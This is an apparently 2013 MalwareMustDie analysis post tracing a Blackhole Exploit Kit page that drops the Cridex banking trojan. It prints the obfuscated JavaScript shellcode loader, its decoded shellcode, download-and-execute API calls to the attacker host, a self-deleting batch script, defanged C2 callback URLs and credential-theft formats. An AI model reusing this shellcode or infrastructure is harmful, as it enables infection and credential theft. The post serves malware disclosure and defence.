- ==================================================================
- #MalwareMustDie! bash-2.02$ date
- Tue Mar 5 09:04:35 2013 @unixfreaxjp
- Proof of Concept of a NEW ACTIVE malware infector:
- IP: 46・4・77・145
- URL: h00p://46・4・77・145:8080/forum/links/column・php
- Verdict: Blackhole Exploit Kit 2.x
- Malware payload: Cridex
- ==================================================================
- --2013-03-06 01:57:44-- h00p://46・4・77・145:8080/forum/links/column・php
- seconds 0・00, Connecting to 46・4・77・145:8080・・・ seconds 0・00, connected・
- :
- GET /forum/links/column.php HTTP/1.0
- Referer: http://google.com/
- Host: 46・4・77・145:8080
- HTTP request sent, awaiting response・・・
- :
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Tue, 05 Mar 2013 16:57:21 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: close
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- 200 OK
- Length: unspecified [text/html]
- Saving to: `column.php'
- 2013-03-06 01:57:47 (81.2 KB/s) - `column.php' saved [156811]
- $ cat ./column.php
- :
- :
- function getShellCode(){
- var a = "
- 8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
- 9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
- 9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
- 70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
- :
- 0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
- b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
- 964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
- fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
- e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
- 0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"・split("")・reverse()・
- join("");
- return a["replace"](/\%!/g, "%" + "u")
- }
- :
- // decoded...
- var a = "8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
- 9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
- 9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
- 70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
- eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%
- :
- 0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
- b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
- 964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
- fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
- e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
- 0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"・split("")・reverse()・join("");
- var xxx= a["replace"](/\%!/g, "%" + "u");
- document・write(xxx);
- // into shellcodes...
- %u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uOde9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278%u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c%uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u1e1c%u1cO6%u1fO6%uO61f%u1c19%u121d%u181O%u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e45%u1a15%u125f%u4419%u1912%u1244%u5e1a%u1912%uOe4e%u4d5a%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u4dOe%u1915%uOe43%u4c5e%u4c15%u43Oe%u1559%u284a%uOO28";
- // translate per api references...
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- // payload url...
- h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b
- // download payload... (for backup the PoC I uploaded here too: http://urlquery.net/report.php?id=1268437 )
- --2013-03-06 02:09:26-- h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b
- seconds 0・00, Connecting to 46・4・77・145:8080・・・ seconds 0・00, connected・
- :
- GET /forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b HTTP/1・0
- Host: 46・4・77・145:8080
- HTTP request sent, awaiting response・・・
- :
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Tue, 05 Mar 2013 17:09:03 GMT
- Content-Type: application/x-msdownload
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Pragma: public
- Expires: Tue, 05 Mar 2013 17:09:04 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="readme.exe"
- Content-Transfer-Encoding: binary
- Content-Length: 102400
- 200 OK
- Length: 102400 (100K) [application/x-msdownload]
- Saving to: `readme.exe'
- 2013-03-06 02:09:28 (53.1 KB/s) - `readme.exe' saved [102400/102400]
- //Faking MS Application (again...)
- StringFileInfo
- CompanyName
- Microsoft Corporation
- FileDescription
- OLE DocFile Property Page
- FileVersion
- 6.0.6000.16386 (vista_rtm.061101-2205)
- InternalName
- docprop.dll
- LegalCopyright
- Microsoft Corporation. All rights reserved.
- OriginalFilename
- docprop.dll
- ProductName
- Microsoft
- Windows
- Operating System
- ProductVersion
- VarFileInfo
- Translation
- // Self deletion batch file:
- @echo off
- del /F /Q /A "%S"
- if exist "%S" goto R
- del /F /Q /A "%S"
- // Wrote files
- %Temp%\exp1.tmp.bat
- %Temp%\exp*.tmp.exe
- %AppData%\KB00927107.exe
- // Malware Process:
- C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp1.tmp.bat""
- C:\Documents and Settings\<USER>\Application Data\KB00927107.exe
- C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp*.tmp.exe
- // Cridex Callbacks...
- h00p://209・17・186・246:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://203・171・234・53:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://64・85・53・168:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://161・246・35・117:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://202・29・5・195:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://213・214・74・5:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://174・121・67・199:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://174・143・234・138:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://18・79・3・253:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://141・219・153・206:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://72・251・206・90:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://149・156・96・9:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://212・68・63・82:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://88・119・156・20:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://91・199・155・222:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://194・249・217・8:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://109・168・106・162:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://85・214・143・90:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://195・191・22・97:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://188・138・96・241:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://31・3・103・101:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://213・251・164・83:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://82・100・228・130:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://194・97・99・120:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://78・47・153・131:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- // Cridex sent Credential formats:
- application/x-www-form-urlencoded
- <http time="%%%uu"><url><![CDATA[%%.%us]]></url><useragent><![CDATA[%%.%us]]></useragent><data><![CDATA[
- ]]></data></http>
- <httpshot time="%%%uu"><url><![CDATA[%%.%us]]></url><data><![CDATA[
- ]]></data></httpshot>
- <ftp time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server><user><![CDATA[%%.%us]]></user><pass><![CDATA[
- ]]></pass></ftp>
- <pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server><user><![CDATA[%%.%us]]></user><pass><![CDATA[
- ]]></pass></pop3>
- <cmd id="%u">%u</cmd>
- <cert time="%u"><pass><![CDATA[
- ]]></pass><data><![CDATA[
- ]]></data></cert>
- <ie time="%u"><data><![CDATA[
- ]]></data></ie>
- <ff time="%u"><data><![CDATA[
- ]]></data></ff>
- <mm time="%u"><data><![CDATA[
- ]]></data></mm>
- <message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"><header><unique>%%.%us</unique><version>%%u</version><system>%%u</system><network>%%u</network></header><data>
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
- </data></message>
- //Credentials stealer scripts commands:
- settings
- commands
- hash
- httpshots
- formgrabber
- redirects
- bconnect
- httpinjects
- //Botnets commands:
- Connection
- modify
- pattern
- replacement
- httpinject
- conditions
- actions
- redirect
- process
- // Virus Total check...
- URL: https://www.virustotal.com/en/file/a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405/analysis/1362504075/
- SHA256: a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405
- SHA1: 014fe37cd0b08936b54dabb2d44ca0901f741184
- MD5: 31de2e1b48a8341c3732b97e61712a56
- File size: 100.0 KB ( 102400 bytes )
- File name: docprop.dll
- File type: Win32 EXE
- Tags: peexe
- Detection ratio: 2 / 46 <========== VERY LOW!!!
- Analysis date: 2013-03-05 17:08:27 UTC ( 14 minutes ago )
- Fortinet : W32/Kryptik.ALRY!tr
- Kaspersky : UDS:DangerousObject.Multi.Generic
- ----
- #MalwareMustDie!!
- @unixfreaxjp